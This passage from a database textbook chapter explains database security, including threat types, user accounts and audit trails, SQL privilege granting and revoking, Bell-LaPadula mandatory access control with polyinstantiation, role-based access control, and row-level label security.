what kinds of information should not be made publicly available—for example, credit ratings and personal medical records. ■ System-related issues such as the system levels at which various security func- tions should be enforced—for example, whether a security function should be handled at the physical hardware level, the operating system level, or the DBMS level. ■ The need in some organizations to identify multiple security levels and to categorize the data and users based on these classifications—for example, top secret, secret, confidential, and unclassified. The security policy of the organization with respect to permitting access to various classifications of data must be enforced. Threats to Databases. Threats to databases can result in the loss or degradation of some or all of the following commonly accepted security goals: integrity, avail- ability, and confidentiality. ■ Loss of integrity. Database integrity refers to the requirement that informa- tion be protected from improper modification. Modification of data includes creation, insertion, updating, changing the status of data, and dele- tion. Integrity is lost if unauthorized changes are made to the data by either intentional or accidental acts. If the loss of system or data integrity is not corrected, continued use of the contaminated system or corrupted data could result in inaccuracy, fraud, or erroneous decisions. ■ Loss of availability. Database availability refers to making objects available to a human user or a program to which they have a legitimate right. ■ Loss of confidentiality. Database confidentiality refers to the protection of data from unauthorized disclosure. The impact of unauthorized disclosure of confidential information can range from violation of the Data Privacy Act to the jeopardization of national security. Unauthorized, unanticipated, or unintentional disclosure could result in loss of public confidence, embar- rassment, or legal action against the organization. 1The substantial contribution of Fariborz Farahmand and Bharath Rengarajan to this and subsequent sections in this chapter is much appreciated. 837 Database Security To protect databases against these types of threats, it is common to implement four kinds of control measures: access control, inference control, flow control, and encryp- tion. We discuss each of these in this chapter. In a multiuser database system, the DBMS must provide techniques to enable cer- tain users or user groups to access selected portions of a database without gaining access to the rest of the database. This is particularly important when a large inte- grated database is to be used by many different users within the same organization. For example, sensitive information such as employee salaries or performance reviews should be kept confidential from most of the database system’s users. A DBMS typically includes a database security and authorization subsystem that is responsible for ensuring the security of portions of a database against unauthorized access. It is now customary to refer to two types of database security mechanisms: ■ Discretionary security mechanisms. These are used to grant privileges to users, including the capability to access specific data files, records, or fields in a specified mode (such as read, insert, delete, or update). ■ Mandatory security mechanisms. These are used to enforce multilevel security by classifying the data and users into various security classes (or lev- els) and then implementing the appropriate security policy of the organiza- tion. For example, a typical security policy is to permit users at a certain classification (or clearance) level to see only the data items classified at the user’s own (or lower) classification level. An extension of this is role-based security, which enforces policies and privileges based on the concept of orga- nizational roles. We discuss discretionary security in Section 2 and mandatory and role-based secu- rity in Section 3. 1.2 Control Measures Four main control measures are used to provide security of data in databases: ■ Access control ■ Inference control ■ Flow control ■ Data encryption A security problem common to computer systems is that of preventing unautho- rized persons from accessing the system itself, either to obtain information or to make malicious changes in a portion of the database. The security mechanism of a DBMS must include provisions for restricting access to the database system as a whole. This function, called access control, is handled by creating user accounts and passwords to control the login process by the DBMS. We discuss access control tech- niques in Section 1.3. Statistical databases are used to provide statistical information or summaries of values based on various criteria. For example, a database for population statistics 838 Database Security may provide statistics based on age groups, income levels, household size, education levels, and other criteria. Statistical database users such as government statisticians or market research firms are allowed to access the database to retrieve statistical information about a population but not to access the detailed confidential informa- tion about specific individuals. Security for statistical databases must ensure that information about individuals cannot be accessed. It is sometimes possible to deduce or infer certain facts concerning individuals from queries that involve only summary statistics on groups; consequently, this must not be permitted either. This problem, called statistical database security, is discussed briefly in Section 4. The corresponding control measures are called inference control measures. Another security issue is that of flow control, which prevents information from flowing in such a way that it reaches unauthorized users. It is discussed in Section 6. Channels that are pathways for information to flow implicitly in ways that violate the security policy of an organization are called covert channels. We briefly discuss some issues related to covert channels in Section 6.1. A final control measure is data encryption, which is used to protect sensitive data (such as credit card numbers) that is transmitted via some type of communications network. Encryption can be used to provide additional protection for sensitive por- tions of a database as well. The data is encoded using some coding algorithm. An unauthorized user who accesses encoded data will have difficulty deciphering it, but authorized users are given decoding or decrypting algorithms (or keys) to decipher the data. Encrypting techniques that are very difficult to decode without a key have been developed for military applications. Section 7 briefly discusses encryption techniques, including popular techniques such as public key encryption, which is heavily used to support Web-based transactions against databases, and digital signa- tures, which are used in personal communications. A comprehensive discussion of security in computer systems and databases is out- side the scope of this text. We give only a brief overview of database security tech- niques here. The interested reader can refer to several of the references discussed in the Selected Bibliography at the end of this chapter for a more comprehensive dis- cussion. 1.3 Database Security and the DBA The database administrator (DBA) is the central authority for managing a data- base system. The DBA’s responsibilities include granting privileges to users who need to use the system and classifying users and data in accordance with the pol- icy of the organization. The DBA has a DBA account in the DBMS, sometimes called a system or superuser account, which provides powerful capabilities that are not made available to regular database accounts and users.2 DBA-privileged commands include commands for granting and revoking privileges to individual 2This account is similar to the root or superuser accounts that are given to computer system administra- tors, which allow access to restricted operating system commands. 839 Database Security accounts, users, or user groups and for performing the following types of actions: 1. Account creation. This action creates a new account and password for a user or a group of users to enable access to the DBMS. 2. Privilege granting. This action permits the DBA to grant certain privileges to certain accounts. 3. Privilege revocation. This action permits the DBA to revoke (cancel) certain privileges that were previously given to certain accounts. 4. Security level assignment. This action consists of assigning user accounts to the appropriate security clearance level. The DBA is responsible for the overall security of the database system. Action 1 in the preceding list is used to control access to the DBMS as a whole, whereas actions 2 and 3 are used to control discretionary database authorization, and action 4 is used to control mandatory authorization. 1.4 Access Control, User Accounts, and Database Audits Whenever a person or a group of persons needs to access a database system, the individual or group must first apply for a user account. The DBA will then create a new account number and password for the user if there is a legitimate need to access the database. The user must log in to the DBMS by entering the account number and password whenever database access is needed. The DBMS checks that the account number and password are valid; if they are, the user is permitted to use the DBMS and to access the database. Application programs can also be considered users and are required to log in to the database. It is straightforward to keep track of database users and their accounts and pass- words by creating an encrypted table or file with two fields: AccountNumber and Password. This table can easily be maintained by the DBMS. Whenever a new account is created, a new record is inserted into the table. When an account is can- celed, the corresponding record must be deleted from the table. The database system must also keep track of all operations on the database that are applied by a certain user throughout each login session, which consists of the sequence of database interactions that a user performs from the time of logging in to the time of logging off. When a user logs in, the DBMS can record the user’s account number and associate it with the computer or device from which the user logged in. All operations applied from that computer or device are attributed to the user’s account until the user logs off. It is particularly important to keep track of update operations that are applied to the database so that, if the database is tam- pered with, the DBA can determine which user did the tampering. To keep a record of all updates applied to the database and of particular users who applied each update, we can modify the system log. Recall that the system log includes an entry for each operation applied to the database that may be required for recovery from a transaction failure or system crash. We can expand the log 840 Database Security entries so that they also include the account number of the user and the online computer or device ID that applied each operation recorded in the log. If any tam- pering with the database is suspected, a database audit is performed, which consists of reviewing the log to examine all accesses and operations applied to the database during a certain time period. When an illegal or unauthorized operation is found, the DBA can determine the account number used to perform the operation. Database audits are particularly important for sensitive databases that are updated by many transactions and users, such as a banking database that is updated by many bank tellers. A database log that is used mainly for security purposes is sometimes called an audit trail. 1.5 Sensitive Data and Types of Disclosures Sensitivity of data is a measure of the importance assigned to the data by its owner, for the purpose of denoting its need for protection. Some databases contain only sensitive data while other databases may contain no sensitive data at all. Handling databases that fall at these two extremes is relatively easy, because these can be cov- ered by access control, which is explained in the next section. The situation becomes tricky when some of the data is sensitive while other data is not. Several factors can cause data to be classified as sensitive: 1. Inherently sensitive. The value of the data itself may be so revealing or con- fidential that it becomes sensitive—for example, a person’s salary or that a patient has HIV/AIDS. 2. From a sensitive source. The source of the data may indicate a need for secrecy—for example, an informer whose identity must be kept secret. 3. Declared sensitive. The owner of the data may have explicitly declared it as sensitive. 4. A sensitive attribute or sensitive record. The particular attribute or record may have been declared sensitive—for example, the salary attribute of an employee or the salary history record in a personnel database. 5. Sensitive in relation to previously disclosed data. Some data may not be sensitive by itself but will become sensitive in the presence of some other data—for example, the exact latitude and longitude information for a loca- tion where some previously recorded event happened that was later deemed sensitive. It is the responsibility of the database administrator and security administrator to collectively enforce the security policies of an organization. This dictates whether access should be permitted to a certain database attribute (also known as a table col- umn or a data element) or not for individual users or for categories of users. Several factors need to be considered before deciding whether it is safe to reveal the data. The three most important factors are data availability, access acceptability, and authenticity assurance. 1. Data availability. If a user is updating a field, then this field becomes inac- cessible and other users should not be able to view this data. This blocking is 841 Database Security only temporary and only to ensure that no user sees any inaccurate data. This is typically handled by the concurrency control mechanism. 2. Access acceptability. Data should only be revealed to authorized users. A database administrator may also deny access to a user request even if the request does not directly access a sensitive data item, on the grounds that the requested data may reveal information about the sensitive data that the user is not authorized to have. 3. Authenticity assurance. Before granting access, certain external characteris- tics about the user may also be considered. For example, a user may only be permitted access during working hours. The system may track previous queries to ensure that a combination of queries does not reveal sensitive data. The latter is particularly relevant to statistical database queries (see Section 5). The term precision, when used in the security area, refers to allowing as much as possible of the data to be available, subject to protecting exactly the subset of data that is sensitive. The definitions of security versus precision are as follows: ■ Security: Means of ensuring that data is kept safe from corruption and that access to it is suitably controlled. To provide security means to disclose only nonsensitive data, and reject any query that references a sensitive field. ■ Precision: To protect all sensitive data while disclosing as much nonsensitive data as possible. The ideal combination is to maintain perfect security with maximum precision. If we want to maintain security, some sacrifice has to be made with precision. Hence there is typically a tradeoff between security and precision. 1.6 Relationship between Information Security versus Information Privacy The rapid advancement of the use of information technology (IT) in industry, gov- ernment, and academia raises challenging questions and problems regarding the protection and use of personal information. Questions of who has what rights to information about individuals for which purposes become more important as we move toward a world in which it is technically possible to know just about anything about anyone. Deciding how to design privacy considerations in technology for the future includes philosophical, legal, and practical dimensions. There is a considerable overlap between issues related to access to resources (security) and issues related to appro- priate use of information (privacy). We now define the difference between security versus privacy. Security in information technology refers to many aspects of protecting a system from unauthorized use, including authentication of users, information encryption, access control, firewall policies, and intrusion detection. For our purposes here, we 842 Database Security will limit our treatment of security to the concepts associated with how well a sys- tem can protect access to information it contains. The concept of privacy goes beyond security. Privacy examines how well the use of personal information that the system acquires about a user conforms to the explicit or implicit assumptions regarding that use. From an end user perspective, privacy can be considered from two different perspectives: preventing storage of personal information versus ensuring appropriate use of personal information. For the purposes of this chapter, a simple but useful definition of privacy is the abil- ity of individuals to control the terms under which their personal information is acquired and used. In summary, security involves technology to ensure that informa- tion is appropriately protected. Security is a required building block for privacy to exist. Privacy involves mechanisms to support compliance with some basic principles and other explicitly stated policies. One basic principle is that people should be informed about information collection, told in advance what will be done with their information, and given a reasonable opportunity to approve of such use of the infor- mation. A related concept, trust, relates to both security and privacy, and is seen as increasing when it is perceived that both security and privacy are provided for. 2 Discretionary Access Control Based on Granting and Revoking Privileges The typical method of enforcing discretionary access control in a database system is based on the granting and revoking of privileges. Let us consider privileges in the context of a relational DBMS. In particular, we will discuss a system of privileges somewhat similar to the one originally developed for the SQL language. Many cur- rent relational DBMSs use some variation of this technique. The main idea is to include statements in the query language that allow the DBA and selected users to grant and revoke privileges. 2.1 Types of Discretionary Privileges In SQL2 and later versions,3 the concept of an authorization identifier is used to refer, roughly speaking, to a user account (or group of user accounts). For simplic- ity, we will use the words user or account interchangeably in place of authorization identifier. The DBMS must provide selective access to each relation in the database based on specific accounts. Operations may also be controlled; thus, having an account does not necessarily entitle the account holder to all the functionality pro- vided by the DBMS. Informally, there are two levels for assigning privileges to use the database system: ■ The account level. At this level, the DBA specifies the particular privileges that each account holds independently of the relations in the database. ■ The relation (or table) level. At this level, the DBA can control the privilege to access each individual relation or view in the database. 3Discretionary privileges were incorporated into SQL2 and are applicable to later versions of SQL. 843 Database Security The privileges at the account level apply to the capabilities provided to the account itself and can include the CREATE SCHEMA or CREATE TABLE privilege, to create a schema or base relation; the CREATE VIEW privilege; the ALTER privilege, to apply schema changes such as adding or removing attributes from relations; the DROP privilege, to delete relations or views; the MODIFY privilege, to insert, delete, or update tuples; and the SELECT privilege, to retrieve information from the database by using a SELECT query. Notice that these account privileges apply to the account in general. If a certain account does not have the CREATE TABLE privilege, no rela- tions can be created from that account. Account-level privileges are not defined as part of SQL2; they are left to the DBMS implementers to define. In earlier versions of SQL, a CREATETAB privilege existed to give an account the privilege to create tables (relations). The second level of privileges applies to the relation level, whether they are base relations or virtual (view) relations. These privileges are defined for SQL2. In the following discussion, the term relation may refer either to a base relation or to a view, unless we explicitly specify one or the other. Privileges at the relation level specify for each user the individual relations on which each type of command can be applied. Some privileges also refer to individual columns (attributes) of relations. SQL2 commands provide privileges at the relation and attribute level only. Although this is quite general, it makes it difficult to create accounts with limited privileges. The granting and revoking of privileges generally follow an authorization model for discretionary privileges known as the access matrix model, where the rows of a matrix M represent subjects (users, accounts, programs) and the columns represent objects (relations, records, columns, views, operations). Each position M(i, j) in the matrix represents the types of privileges (read, write, update) that subject i holds on object j. To control the granting and revoking of relation privileges, each relation R in a data- base is assigned an owner account, which is typically the account that was used when the relation was created in the first place. The owner of a relation is given all privileges on that relation. In SQL2, the DBA can assign an owner to a whole schema by creating the schema and associating the appropriate authorization iden- tifier with that schema, using the CREATE SCHEMA command. The owner account holder can pass privileges on any of the owned relations to other users by granting privileges to their accounts. In SQL the following types of privileges can be granted on each individual relation R: ■ SELECT (retrieval or read) privilege on R. Gives the account retrieval privi- lege. In SQL this gives the account the privilege to use the SELECT statement to retrieve tuples from R. ■ Modification privileges on R. This gives the account the capability to mod- ify the tuples of R. In SQL this includes three privileges: UPDATE, DELETE, and INSERT. These correspond to the three SQL commands (see Section 4.4) for modifying a table R. Additionally, both the INSERT and UPDATE privi- leges can specify that only certain attributes of R can be modified by the account. 844 Database Security ■ References privilege on R. This gives the account the capability to reference (or refer to) a relation R when specifying integrity constraints. This privilege can also be restricted to specific attributes of R. Notice that to create a view, the account must have the SELECT privilege on all rela- tions involved in the view definition in order to specify the query that corresponds to the view. 2.2 Specifying Privileges through the Use of Views The mechanism of views is an important discretionary authorization mechanism in its own right. For example, if the owner A of a relation R wants another account B to be able to retrieve only some fields of R, then A can create a view V of R that includes only those attributes and then grant SELECT on V to B. The same applies to limiting B to retrieving only certain tuples of R; a view V�can be created by defin- ing the view by means of a query that selects only those tuples from R that A wants to allow B to access. We will illustrate this discussion with the example given in Section 2.5. 2.3 Revoking of Privileges In some cases it is desirable to grant a privilege to a user temporarily. For example, the owner of a relation may want to grant the SELECT privilege to a user for a spe- cific task and then revoke that privilege once the task is completed. Hence, a mech- anism for revoking privileges is needed. In SQL a REVOKE command is included for the purpose of canceling privileges. We will see how the REVOKE command is used in the example in Section 2.5. 2.4 Propagation of Privileges Using the GRANT OPTION Whenever the owner A of a relation R grants a privilege on R to another account B, the privilege can be given to B with or without the GRANT OPTION. If the GRANT OPTION is given, this means that B can also grant that privilege on R to other accounts. Suppose that B is given the GRANT OPTION by A and that B then grants the privilege on R to a third account C, also with the GRANT OPTION. In this way, privileges on R can propagate to other accounts without the knowledge of the owner of R. If the owner account A now revokes the privilege granted to B, all the privileges that B propagated based on that privilege should automatically be revoked by the system. It is possible for a user to receive a certain privilege from two or more sources. For example, A4 may receive a certain UPDATE R privilege from both A2 and A3. In such a case, if A2 revokes this privilege from A4, A4 will still continue to have the privilege by virtue of having been granted it from A3. If A3 later revokes the privilege from A4, A4 totally loses the privilege. Hence, a DBMS that allows propagation of privi- leges must keep track of how all the privileges were granted so that revoking of priv- ileges can be done correctly and completely. 845 Database Security 2.5 An Example to Illustrate Granting and Revoking of Privileges Suppose that the DBA creates four accounts—A1, A2, A3, and A4—and wants only A1 to be able to create base relations. To do this, the DBA must issue the following GRANT command in SQL: GRANT CREATETAB TO A1; The CREATETAB (create table) privilege gives account A1 the capability to create new database tables (base relations) and is hence an account privilege. This privilege was part of earlier versions of SQL but is now left to each individual system imple- mentation to define. In SQL2 the same effect can be accomplished by having the DBA issue a CREATE SCHEMA command, as follows: CREATE SCHEMA EXAMPLE AUTHORIZATION A1; User account A1 can now create tables under the schema called EXAMPLE. To con- tinue our example, suppose that A1 creates the two base relations EMPLOYEE and DEPARTMENT shown in Figure 1; A1 is then the owner of these two relations and hence has all the relation privileges on each of them. Next, suppose that account A1 wants to grant to account A2 the privilege to insert and delete tuples in both of these relations. However, A1 does not want A2 to be able to propagate these privileges to additional accounts. A1 can issue the following com- mand: GRANT INSERT, DELETE ON EMPLOYEE, DEPARTMENT TO A2; Notice that the owner account A1 of a relation automatically has the GRANT OPTION, allowing it to grant privileges on the relation to other accounts. However, account A2 cannot grant INSERT and DELETE privileges on the EMPLOYEE and DEPARTMENT tables because A2 was not given the GRANT OPTION in the preceding command. Next, suppose that A1 wants to allow account A3 to retrieve information from either of the two tables and also to be able to propagate the SELECT privilege to other accounts. A1 can issue the following command: GRANT SELECT ON EMPLOYEE, DEPARTMENT TO A3 WITH GRANT OPTION; DEPARTMENT DnameDnumber Mgr_ssn Name Bdate Address Sex Salary Dno EMPLOYEE Ssn Figure 1 Schemas for the two relations EMPLOYEE and DEPARTMENT. 846 Database Security The clause WITH GRANT OPTION means that A3 can now propagate the privilege to other accounts by using GRANT. For example, A3 can grant the SELECT privilege on the EMPLOYEE relation to A4 by issuing the following command: GRANT SELECT ON EMPLOYEE TO A4; Notice that A4 cannot propagate the SELECT privilege to other accounts because the GRANT OPTION was not given to A4. Now suppose that A1 decides to revoke the SELECT privilege on the EMPLOYEE relation from A3; A1 then can issue this command: REVOKE SELECT ON EMPLOYEE FROM A3; The DBMS must now revoke the SELECT privilege on EMPLOYEE from A3, and it must also automatically revoke the SELECT privilege on EMPLOYEE from A4. This is because A3 granted that privilege to A4, but A3 does not have the privilege any more. Next, suppose that A1 wants to give back to A3 a limited capability to SELECT from the EMPLOYEE relation and wants to allow A3 to be able to propagate the privilege. The limitation is to retrieve only the Name, Bdate, and Address attributes and only for the tuples with Dno = 5. A1 then can create the following view: CREATE VIEW A3EMPLOYEE AS SELECT Name, Bdate, Address FROM EMPLOYEE WHERE Dno = 5; After the view is created, A1 can grant SELECT on the view A3EMPLOYEE to A3 as follows: GRANT SELECT ON A3EMPLOYEE TO A3 WITH GRANT OPTION; Finally, suppose that A1 wants to allow A4 to update only the Salary attribute of EMPLOYEE; A1 can then issue the following command: GRANT UPDATE ON EMPLOYEE (Salary) TO A4; The UPDATE and INSERT privileges can specify particular attributes that may be updated or inserted in a relation. Other privileges (SELECT, DELETE) are not attrib- ute specific, because this specificity can easily be controlled by creating the appro- priate views that include only the desired attributes and granting the corresponding privileges on the views. However, because updating views is not always possible, the UPDATE and INSERT privileges are given the option to specify the particular attrib- utes of a base relation that may be updated. 2.6 Specifying Limits on Propagation of Privileges Techniques to limit the propagation of privileges have been developed, although they have not yet been implemented in most DBMSs and are not a part of SQL. Limiting horizontal propagation to an integer number i means that an account B given the GRANT OPTION can grant the privilege to at most i other accounts. 847 Database Security Vertical propagation is more complicated; it limits the depth of the granting of privileges. Granting a privilege with a vertical propagation of zero is equivalent to granting the privilege with no GRANT OPTION. If account A grants a privilege to account B with the vertical propagation set to an integer number j > 0, this means
that the account B has the GRANT OPTION on that privilege, but B can grant the
privilege to other accounts only with a vertical propagation less than j. In effect, ver-
tical propagation limits the sequence of GRANT OPTIONS that can be given from
one account to the next based on a single original grant of the privilege.

We briefly illustrate horizontal and vertical propagation limits—which are not
available currently in SQL or other relational systems—with an example. Suppose
that A1 grants SELECT to A2 on the EMPLOYEE relation with horizontal propaga-
tion equal to 1 and vertical propagation equal to 2. A2 can then grant SELECT to at
most one account because the horizontal propagation limitation is set to 1.
Additionally, A2 cannot grant the privilege to another account except with vertical
propagation set to 0 (no GRANT OPTION) or 1; this is because A2 must reduce the
vertical propagation by at least 1 when passing the privilege to others. In addition,
the horizontal propagation must be less than or equal to the originally granted hor-
izontal propagation. For example, if account A grants a privilege to account B with
the horizontal propagation set to an integer number j > 0, this means that B can
grant the privilege to other accounts only with a horizontal propagation less than or
equal to j. As this example shows, horizontal and vertical propagation techniques are
designed to limit the depth and breadth of propagation of privileges.

3 Mandatory Access Control and Role-Based
Access Control for Multilevel Security

The discretionary access control technique of granting and revoking privileges on
relations has traditionally been the main security mechanism for relational database
systems. This is an all-or-nothing method: A user either has or does not have a cer-
tain privilege. In many applications, an additional security policy is needed that clas-
sifies data and users based on security classes. This approach, known as mandatory
access control (MAC), would typically be combined with the discretionary access
control mechanisms described in Section 2. It is important to note that most com-
mercial DBMSs currently provide mechanisms only for discretionary access con-
trol. However, the need for multilevel security exists in government, military, and
intelligence applications, as well as in many industrial and corporate applications.
Some DBMS vendors—for example, Oracle—have released special versions of their
RDBMSs that incorporate mandatory access control for government use.

Typical security classes are top secret (TS), secret (S), confidential (C), and unclas-
sified (U), where TS is the highest level and U the lowest. Other more complex secu-
rity classification schemes exist, in which the security classes are organized in a
lattice. For simplicity, we will use the system with four security classification levels,
where TS ≥ S ≥ C ≥ U, to illustrate our discussion. The commonly used model for
multilevel security, known as the Bell-LaPadula model, classifies each subject (user,

848

Database Security

account, program) and object (relation, tuple, column, view, operation) into one of
the security classifications TS, S, C, or U. We will refer to the clearance (classifica-
tion) of a subject S as class(S) and to the classification of an object O as class(O).
Two restrictions are enforced on data access based on the subject/object classifica-
tions:

1. A subject S is not allowed read access to an object O unless class(S) ≥
class(O). This is known as the simple security property.

2. A subject S is not allowed to write an object O unless class(S) ≤ class(O). This
is known as the star property (or *-property).

The first restriction is intuitive and enforces the obvious rule that no subject can
read an object whose security classification is higher than the subject’s security
clearance. The second restriction is less intuitive. It prohibits a subject from writing
an object at a lower security classification than the subject’s security clearance.
Violation of this rule would allow information to flow from higher to lower classifi-
cations, which violates a basic tenet of multilevel security. For example, a user (sub-
ject) with TS clearance may make a copy of an object with classification TS and then
write it back as a new object with classification U, thus making it visible throughout
the system.

To incorporate multilevel security notions into the relational database model, it is
common to consider attribute values and tuples as data objects. Hence, each attrib-
ute A is associated with a classification attribute C in the schema, and each attrib-
ute value in a tuple is associated with a corresponding security classification. In
addition, in some models, a tuple classification attribute TC is added to the relation
attributes to provide a classification for each tuple as a whole. The model we
describe here is known as the multilevel model, because it allows classifications at
multiple security levels. A multilevel relation schema R with n attributes would be
represented as:

R(A1, C1, A2, C2, …, An, Cn, TC)

where each Ci represents the classification attribute associated with attribute Ai.

The value of the tuple classification attribute TC in each tuple t—which is the
highest of all attribute classification values within t—provides a general classifica-
tion for the tuple itself. Each attribute classification Ci provides a finer security clas-
sification for each attribute value within the tuple. The value of TC in each tuple t is
the highest of all attribute classification values Ci within t.

The apparent key of a multilevel relation is the set of attributes that would have
formed the primary key in a regular (single-level) relation. A multilevel relation will
appear to contain different data to subjects (users) with different clearance levels. In
some cases, it is possible to store a single tuple in the relation at a higher classifica-
tion level and produce the corresponding tuples at a lower-level classification
through a process known as filtering. In other cases, it is necessary to store two or
more tuples at different classification levels with the same value for the apparent key.

849

Database Security

This leads to the concept of polyinstantiation,4 where several tuples can have the
same apparent key value but have different attribute values for users at different
clearance levels.

We illustrate these concepts with the simple example of a multilevel relation shown
in Figure 2(a), where we display the classification attribute values next to each
attribute’s value. Assume that the Name attribute is the apparent key, and consider
the query SELECT * FROM EMPLOYEE. A user with security clearance S would see
the same relation shown in Figure 2(a), since all tuple classifications are less than or
equal to S. However, a user with security clearance C would not be allowed to see the
values for Salary of ‘Brown’ and Job_performance of ‘Smith’, since they have higher
classification. The tuples would be filtered to appear as shown in Figure 2(b), with
Salary and Job_performance appearing as null. For a user with security clearance U,
the filtering allows only the Name attribute of ‘Smith’ to appear, with all the other

Name Salary JobPerformance TC
Smith U C40000 SFair S
Smith U C40000 CExcellent C
Brown C S80000 CGood S

EMPLOYEE(d)

Name Salary JobPerformance TC
Smith U C40000 SFair S
Brown C S80000 CGood S

EMPLOYEE(a)

Name Salary JobPerformance TC

Smith U C40000 CNULL C
Brown C CNULL CGood C

EMPLOYEE(b)

Name Salary JobPerformance TC

Smith U UNULL UNULL U

EMPLOYEE(c)

Figure 2
A multilevel relation to illus-
trate multilevel security. (a)
The original EMPLOYEE
tuples. (b) Appearance of
EMPLOYEE after filtering
for classification C users.
(c) Appearance of
EMPLOYEE after filtering
for classification U users.
(d) Polyinstantiation of the
Smith tuple.

4This is similar to the notion of having multiple versions in the database that represent the same real-
world object.

850

Database Security

attributes appearing as null (Figure 2(c)). Thus, filtering introduces null values for
attribute values whose security classification is higher than the user’s security clear-
ance.

In general, the entity integrity rule for multilevel relations states that all attributes
that are members of the apparent key must not be null and must have the same
security classification within each individual tuple. Additionally, all other attribute
values in the tuple must have a security classification greater than or equal to that of
the apparent key. This constraint ensures that a user can see the key if the user is
permitted to see any part of the tuple. Other integrity rules, called null integrity
and interinstance integrity, informally ensure that if a tuple value at some security
level can be filtered (derived) from a higher-classified tuple, then it is sufficient to
store the higher-classified tuple in the multilevel relation.

To illustrate polyinstantiation further, suppose that a user with security clearance C
tries to update the value of Job_performance of ‘Smith’ in Figure 2 to ‘Excellent’; this
corresponds to the following SQL update being submitted by that user:

UPDATE EMPLOYEE
SET Job_performance = ‘Excellent’
WHERE Name = ‘Smith’;

Since the view provided to users with security clearance C (see Figure 2(b)) permits
such an update, the system should not reject it; otherwise, the user could infer that
some nonnull value exists for the Job_performance attribute of ‘Smith’ rather than
the null value that appears. This is an example of inferring information through
what is known as a covert channel, which should not be permitted in highly secure
systems (see Section 6.1). However, the user should not be allowed to overwrite the
existing value of Job_performance at the higher classification level. The solution is to
create a polyinstantiation for the ‘Smith’ tuple at the lower classification level C, as
shown in Figure 2(d). This is necessary since the new tuple cannot be filtered from
the existing tuple at classification S.

The basic update operations of the relational model (INSERT, DELETE, UPDATE)
must be modified to handle this and similar situations, but this aspect of the prob-
lem is outside the scope of our presentation. We refer the interested reader to the
Selected Bibliography at the end of this chapter for further details.

3.1 Comparing Discretionary Access Control
and Mandatory Access Control

Discretionary access control (DAC) policies are characterized by a high degree of
flexibility, which makes them suitable for a large variety of application domains.
The main drawback of DAC models is their vulnerability to malicious attacks, such
as Trojan horses embedded in application programs. The reason is that discre-
tionary authorization models do not impose any control on how information is
propagated and used once it has been accessed by users authorized to do so. By con-
trast, mandatory policies ensure a high degree of protection—in a way, they prevent

851

Database Security

any illegal flow of information. Therefore, they are suitable for military and high
security types of applications, which require a higher degree of protection.
However, mandatory policies have the drawback of being too rigid in that they
require a strict classification of subjects and objects into security levels, and there-
fore they are applicable to few environments. In many practical situations, discre-
tionary policies are preferred because they offer a better tradeoff between security
and applicability.

3.2 Role-Based Access Control
Role-based access control (RBAC) emerged rapidly in the 1990s as a proven tech-
nology for managing and enforcing security in large-scale enterprise-wide systems.
Its basic notion is that privileges and other permissions are associated with organi-
zational roles, rather than individual users. Individual users are then assigned to
appropriate roles. Roles can be created using the CREATE ROLE and DESTROY
ROLE commands. The GRANT and REVOKE commands discussed in Section 2 can
then be used to assign and revoke privileges from roles, as well as for individual
users when needed. For example, a company may have roles such as sales account
manager, purchasing agent, mailroom clerk, department manager, and so on.
Multiple individuals can be assigned to each role. Security privileges that are com-
mon to a role are granted to the role name, and any individual assigned to this role
would automatically have those privileges granted.

RBAC can be used with traditional discretionary and mandatory access controls; it
ensures that only authorized users in their specified roles are given access to certain
data or resources. Users create sessions during which they may activate a subset of
roles to which they belong. Each session can be assigned to several roles, but it maps
to one user or a single subject only. Many DBMSs have allowed the concept of roles,
where privileges can be assigned to roles.

Separation of duties is another important requirement in various commercial
DBMSs. It is needed to prevent one user from doing work that requires the involve-
ment of two or more people, thus preventing collusion. One method in which sepa-
ration of duties can be successfully implemented is with mutual exclusion of roles.
Two roles are said to be mutually exclusive if both the roles cannot be used simul-
taneously by the user. Mutual exclusion of roles can be categorized into two types,
namely authorization time exclusion (static) and runtime exclusion (dynamic). In
authorization time exclusion, two roles that have been specified as mutually exclu-
sive cannot be part of a user’s authorization at the same time. In runtime exclusion,
both these roles can be authorized to one user but cannot be activated by the user at
the same time. Another variation in mutual exclusion of roles is that of complete
and partial exclusion.

The role hierarchy in RBAC is a natural way to organize roles to reflect the organi-
zation’s lines of authority and responsibility. By convention, junior roles at the
bottom are connected to progressively senior roles as one moves up the hierarchy.
The hierarchic diagrams are partial orders, so they are reflexive, transitive, and

852

Database Security

antisymmetric. In other words, if a user has one role, the user automatically has
roles lower in the hierarchy. Defining a role hierarchy involves choosing the type of
hierarchy and the roles, and then implementing the hierarchy by granting roles to
other roles. Role hierarchy can be implemented in the following manner:

GRANT ROLE full_time TO employee_type1
GRANT ROLE intern TO employee_type2

The above are examples of granting the roles full_time and intern to two types of
employees.

Another issue related to security is identity management. Identity refers to a unique
name of an individual person. Since the legal names of persons are not necessarily
unique, the identity of a person must include sufficient additional information to
make the complete name unique. Authorizing this identity and managing the
schema of these identities is called Identity Management. Identity Management
addresses how organizations can effectively authenticate people and manage their
access to confidential information. It has become more visible as a business require-
ment across all industries affecting organizations of all sizes. Identity Management
administrators constantly need to satisfy application owners while keeping expendi-
tures under control and increasing IT efficiency.

Another important consideration in RBAC systems is the possible temporal con-
straints that may exist on roles, such as the time and duration of role activations,
and timed triggering of a role by an activation of another role. Using an RBAC
model is a highly desirable goal for addressing the key security requirements of
Web-based applications. Roles can be assigned to workflow tasks so that a user with
any of the roles related to a task may be authorized to execute it and may play a cer-
tain role only for a certain duration.

RBAC models have several desirable features, such as flexibility, policy neutrality,
better support for security management and administration, and other aspects that
make them attractive candidates for developing secure Web-based applications.
These features are lacking in DAC and MAC models. In addition, RBAC models
include the capabilities available in traditional DAC and MAC policies.
Furthermore, an RBAC model provides mechanisms for addressing the security
issues related to the execution of tasks and workflows, and for specifying user-
defined and organization-specific policies. Easier deployment over the Internet has
been another reason for the success of RBAC models.

3.3 Label-Based Security and Row-Level Access Control
Many commercial DBMSs currently use the concept of row-level access control,
where sophisticated access control rules can be implemented by considering the
data row by row. In row-level access control, each data row is given a label, which is
used to store information about data sensitivity. Row-level access control provides
finer granularity of data security by allowing the permissions to be set for each row
and not just for the table or column. Initially the user is given a default session label
by the database administrator. Levels correspond to a hierarchy of data-sensitivity

853

Database Security

levels to exposure or corruption, with the goal of maintaining privacy or security.
Labels are used to prevent unauthorized users from viewing or altering certain data.
A user having a low authorization level, usually represented by a low number, is
denied access to data having a higher-level number. If no such label is given to a row,
a row label is automatically assigned to it depending upon the user’s session label.

A policy defined by an administrator is called a Label Security policy. Whenever
data affected by the policy is accessed or queried through an application, the policy
is automatically invoked. When a policy is implemented, a new column is added to
each row in the schema. The added column contains the label for each row that
